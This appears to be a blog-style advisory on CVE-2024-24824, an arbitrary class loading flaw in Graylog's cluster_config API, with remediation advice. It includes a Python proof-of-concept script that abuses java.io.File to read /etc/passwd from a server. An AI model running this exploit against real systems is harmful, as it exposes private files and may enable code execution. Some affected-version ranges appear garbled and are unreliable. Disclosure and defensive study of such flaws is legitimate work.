CVE-2024-24824: Graylog Arbitrary Class Loading Leading to Information Exposure and Remote Code Execution

Graylog is a powerful, free, and open-source log management platform that simplifies the process of collecting, storing, and analyzing logs from various sources. However, a recently discovered vulnerability with the CVE ID CVE-2024-24824 has been found in Graylog versions 2.. up to 5.1.10 and 5.2. up to 5.2.3. The vulnerability allows attackers to load arbitrary classes and instantiate them using a HTTP PUT request to the /api/system/cluster_config/ endpoint.

This vulnerability could lead to information exposure and remote code execution if exploited by a user with appropriate permissions, making it essential for Graylog users to update their software to versions 5.1.11 or 5.2.4 that contain a fix for this issue.

In this post, we will dive into the details of CVE-2024-24824, examining the possible exploits and providing code snippets, links to original references, and steps to remediate the vulnerability.

Exploit Details

When a user with proper permissions performs an HTTP PUT request to the /api/system/cluster_config/ endpoint, the Graylog's cluster config system attempts to validate the existence of the requested class before using them. To do this, it loads the class using the class loader, leading to arbitrary classes with 1-arg String constructors being instantiated. This subsequently causes the execution of arbitrary code that runs during class instantiation.

A particular use case of this vulnerability involves java.io.File. When the internal web-server stack processes the request while a file object is being instantiated, the contents of the entire file get included in the response to the REST request, causing information exposure.

Code Snippet

Here is a simple code snippet demonstrating the exploitation of CVE-2024-24824 using Python's requests library:

import requests

# Replace with your Graylog URL, API Key, and target file path
graylog_url = "https://yourgraylogurl.com";
api_key = "yourapikey"
target_file = "/etc/passwd"

headers = {
    "X-Requested-By": "CVE-2024-24824",
    "Authorization": f"Bearer {api_key}",
    "Content-Type": "application/json",
    "Accept": "application/json",
}

payload = f'{{"java.io.File":"{target_file}"}}'

response = requests.put(
    f"{graylog_url}/api/system/cluster_config/",
    headers=headers,
    data=payload,
)

if response.status_code == 200:
    print("Vulnerability exploited successfully. File contents:")
    print(response.text)
else:
    print("Failed to exploit vulnerability.", response.text)

Original References

The original CVE details can be found on the CVE website and the National Vulnerability Database.

Further information on the Graylog vulnerability can be found on the Graylog GitHub repository, and the fix commit can be found here.

Remediation

To remediate the CVE-2024-24824 vulnerability, Graylog users should upgrade their installations to version 5.1.11 or 5.2.4. These versions contain a fix that prevents the arbitrary class loading issue and information exposure.

Additionally, ensure that you limit access to your Graylog instance, particularly for users with appropriate permissions to make HTTP PUT requests to the /api/system/cluster_config/ endpoint.

In conclusion, users of Graylog version 2.. up to 5.1.10 and 5.2. up to 5.2.3 should promptly update their installations to the patched versions 5.1.11 or 5.2.4. This update resolves the CVE-2024-24824 vulnerability, protecting users from potential information exposure and remote code execution risks. By taking these steps, organizations can continue to leverage the power of Graylog to safely and efficiently manage their log data.

Timeline

Published on: 02/07/2024 18:15:55 UTC
Last modified on: 02/15/2024 15:40:51 UTC